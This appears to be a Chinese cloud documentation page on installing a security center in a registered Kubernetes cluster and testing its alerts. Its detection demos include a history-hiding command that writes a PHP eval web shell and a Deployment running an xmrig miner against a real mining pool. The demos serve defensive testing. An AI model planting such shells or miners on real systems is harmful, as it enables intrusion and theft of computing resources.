AI 助理
备案控制台
文档
输入文档关键字查找
首页 容器服务 Kubernetes 版 ACK 分布式云容器平台ACK One 操作指南 注册集群 安全管理 在注册集群中安装和使用云安全中心

在注册集群中安装和使用云安全中心

更新时间:
产品详情
我的收藏

云安全中心是一个实时识别、分析、预警安全威胁的统一安全管理系统,通过防勒索、防病毒、防篡改、镜像安全扫描、合规检查等安全能力,帮助您实现威胁检测、响应、溯源的自动化安全运营闭环,保护云上资产和本地服务器,同时满足监管合规要求。本文介绍如何在注册集群上安装和使用云安全中心。

前提条件

背景信息

云安全中心通过安全告警,实时抵御恶意入侵、使用漏洞和基线配置检测、消除系统弱点、预防恶意攻击,提供安全态势分析和安全可视化界面,满足事后追溯和分析需求,帮助您建立完整的资产(包括公有云服务器、混合云服务器、容器、云产品等)安全防护体系。

步骤一:安装云安全中心

  1. 登录容器服务管理控制台,在左侧导航栏选择市场 > 应用市场

  2. 应用市场页面,单击应用目录页签,搜索并选中ack-aegis-installer

  3. ack-aegis-installer页面,单击一键部署

  4. 基本信息配置向导中,选择集群和命名空间,然后单击下一步

  5. 配置ack-aegis-installer组件相关参数信息。

    1. 登录云安全中心控制台,在左侧导航栏选择系统配置 > 功能设置

    2. 功能设置页面,单击客户端页签,然后单击安装命令页签,获取如下intall_key信息。

      install-key

    3. 参数配置页面,设置相应参数,然后单击确定

      重要

      若您的install_key信息未填写或填写错误,会导致云安全中心安装失败。

      参数

      说明

      默认值

      controller.cluster_id

      集群ID

      当前所选择的集群ID,自动注入。

      controller.cluster_name

      集群名称

      当前所选择的集群名称,自动注入。

      limit_cpu

      CPU占用限制

      200m

      limit_memory

      内存占用限制

      128Mi

      imagePullPolicy

      镜像拉取策略

      Always

      install_key

      客户端安装Key

      默认为空,此处必须使用上一步获取的intall_key信息进行填充。

步骤二:使用云安全中心

通过两个攻防示例说明如何在注册集群中使用云安全中心。

示例一: 在Pod中执行可疑命令

  1. 使用以下内容,创建ubuntu.yaml文件。

    apiVersion: v1
kind: Pod
metadata:
  name: ubuntu
  labels:
    app: ubuntu
spec:
  containers:
  - name: ubuntu
    image: ubuntu:latest
    command: ["/bin/sleep", "3650d"]
    imagePullPolicy: IfNotPresent
  restartPolicy: Always

  2. 执行以下命令,部署Ubuntu测试Pod。

    kubectl apply -f ubuntu.yaml

  3. 执行以下命令,在已部署好的Pod中以匿名的方式执行一个可疑的WebShell写入行为。

    bash -c "unset HISTFILE && echo '<?php @eval(\$_POST['x']); ?>' >shell.php"

  4. 登录云安全中心控制台查看威胁检测结果。

    在安全告警列表中出现三条攻击相关的事件告警,具体查看操作,请参见查看和处理安全告警11

    查看告警详情如下。

    12

示例二:集群被植入挖矿容器

说明

以下示例中的测试镜像基于真实的恶意挖矿镜像xmrig制作,用于模拟挖矿攻击。

  1. 导入测试的恶意挖矿镜像miner_image_xmrig.tar到指定的测试节点上。

  2. 使用以下内容,创建miner-test.yaml文件。

    apiVersion: apps/v1 # for versions before 1.8.0 use apps/v1beta1
kind: Deployment
metadata:
  name: miner-test
  labels:
    app: miner-test
spec:
  replicas: 1
  selector:
    matchLabels:
      app: miner-test
  template:
    metadata:
      labels:
        app: miner-test
    spec:
      containers:
      - name: miner-test
        image: xxxxx        //  镜像地址。
        args: ["-o xmr-eu2.nanopool.org:14444 -u AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -p worker -a rx/0"]

  3. 执行以下命令,启动挖矿容器。

    kubectl apply -f miner-test.yaml

  4. 登录云安全中心控制台查看威胁检测结果。

    威胁检测结果如下所示,具体查看操作,请参见查看和处理安全告警dig

  5. 执行以下命令,停止并删除该Deployment。

    重要

    测试完成后,必须删除对应的Deployment。

    kubectl delete Deployment miner-test

上一篇:在注册集群中配置容器安全策略(新版)下一篇:启用集群API Server审计功能
文档推荐